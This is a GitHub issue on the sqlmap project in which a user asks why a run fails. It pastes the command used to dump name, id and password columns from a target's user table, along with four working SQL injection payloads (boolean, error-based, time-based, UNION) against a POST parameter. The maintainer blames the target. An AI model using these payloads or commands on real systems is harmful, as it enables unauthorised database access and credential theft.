search

sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org
Other
31.86k stars 5.66k forks source link

[WARNING] something went wrong with full UNION #1742

Closed syntaxerror454 closed 8 years ago

syntaxerror454 commented 8 years ago

sqlmap -r ndeh -D database -T Tuser -C name,id,password --dump --level 5 --risk 3 --time-sec 1000 --parse-errors -p bulan --ignore-proxy --random-agent --threads 2 --no-cast **| |_ {1.0-dev-nongit-201602010a89} |_ -| . | | | .'| . | || |||||**,| | || |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:59:17

[12:59:17] [INFO] parsing HTTP request from 'ndeh' [12:59:17] [INFO] fetched random HTTP User-Agent header from file '/usr/share/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2' [12:59:17] [INFO] resuming back-end DBMS 'mysql' [12:59:18] [INFO] testing connection to the target URL [12:59:19] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS

sqlmap resumed the following injection point(s) from stored session:

Parameter: bulan (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (Generic comment) Payload: bulan=-1128') OR 3282=3282-- -&tahun=2016&submit=go!

Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: bulan=-8534') OR 1 GROUP BY CONCAT(0x7178706271,(SELECT (CASE WHEN (7816=7816) THEN 1 ELSE 0 END)),0x716b6a6a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&tahun=2016&submit=go!

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
Payload: bulan=03') AND (SELECT * FROM (SELECT(SLEEP(1000)))APXw)#&tahun=2016&submit=go!

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: bulan=03') UNION ALL SELECT NULL,CONCAT(0x7178706271,0x5358474e4358684855714a4577486854507354466162434d5054456a4d5a6b6e5058704f4657656f,0x716b6a6a71),NULL,NULL,NULL,NULL-- -&tahun=2016&submit=go!

[12:59:19] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5 [12:59:19] [INFO] fetching entries of column(s) 'name, id, password' entries for table 'T_user' in database 'database' [12:59:19] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique [12:59:19] [WARNING] the SQL query provided does not return any output [12:59:20] [WARNING] the SQL query provided does not return any output [12:59:20] [INFO] fetching number of column(s) 'name, id, password' entries for table 'T_user' in database 'database' [12:59:20] [INFO] retrieved: [12:59:21] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically [12:59:21] [WARNING] time-based comparison requires larger statistical model, please wait................
[12:59:23] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors

[12:59:23] [WARNING] unable to retrieve the number of column(s) 'name, id, password' entries for table 'T_user' in database 'database' [12:59:23] [INFO] fetched data logged to text files under '/root/.sqlmap/output/website'.

[*] shutting down at 12:59:23

i got tired about this reason, please help me to find why? :(

stamparm commented 8 years ago

You are not getting anything with 4 different methods: full union, partial union, error-based, time-based. I would say that you have problems with your target not the sqlmap